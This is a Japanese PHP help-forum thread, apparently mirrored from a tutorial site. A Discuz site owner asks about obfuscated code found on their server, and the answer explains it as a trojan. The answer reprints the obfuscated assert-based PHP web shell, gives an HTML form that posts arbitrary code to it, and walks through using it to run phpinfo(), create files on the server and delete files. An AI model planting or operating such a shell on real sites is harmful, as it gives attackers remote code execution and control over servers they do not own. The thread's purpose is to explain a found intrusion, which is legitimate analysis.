ホームページ > バックエンド開発 > PHPチュートリアル > discuzにこのコードがあります

discuzにこのコードがあります

WBOY
リリース: 2016-06-13 12:22:12
オリジナル
1001 人が閲覧しました

discuz
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r にこのコードがあります";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_ /*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/* -/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/ *-* /]);?>

これはどういう意味ですか?
私の Web サイトがホスティング会社によってブロックされました。その後、ゲームのログインを削除するように求められました。理解できなかったので、FTP を調べました。
このコードは、何かによって挿入されたものなのでしょうか。ハッカー?

------解決策---------------------- はトロイの木馬であり、assert を使用して php を実行します。機能的。


7.php

<br /><?php                  <br />@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  <br />@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  <br />@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  <br />[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?><br />
ログイン後にコピー

次に、7.php を呼び出す HTML ファイルを作成します。これはどこにでも配置でき、アクションは 7 です。 php を対応する http パスに変更するだけです。

shell.html
<br /><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><br /><html><br /> <head><br />  <title> New Document </title><br /> </head><br /><br /> <body><br />  <form name="form1" method="post" action="http://fdipzone.com/fdipzone/7.php"><br />  <textarea name="-7" style="width:500px; height:300px"></textarea>  <br />  <input type="submit" value="submit"><br /></form><br /> </body><br /></html><br />
ログイン後にコピー

次に、shell.html、
1 を実行します。テキストエリアに
phpinfo(); と入力します。とすると、phpinfo();2の情報が表示されます。例えば、
file_put_contents('abc.php','', true)と入力すると確認できます。 textarea ; を送信すると、abc.php ファイルがサーバー上に作成されます。 3.
unlink('xxxxx'); を入力して、xxx​​ ファイルを削除します。

関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート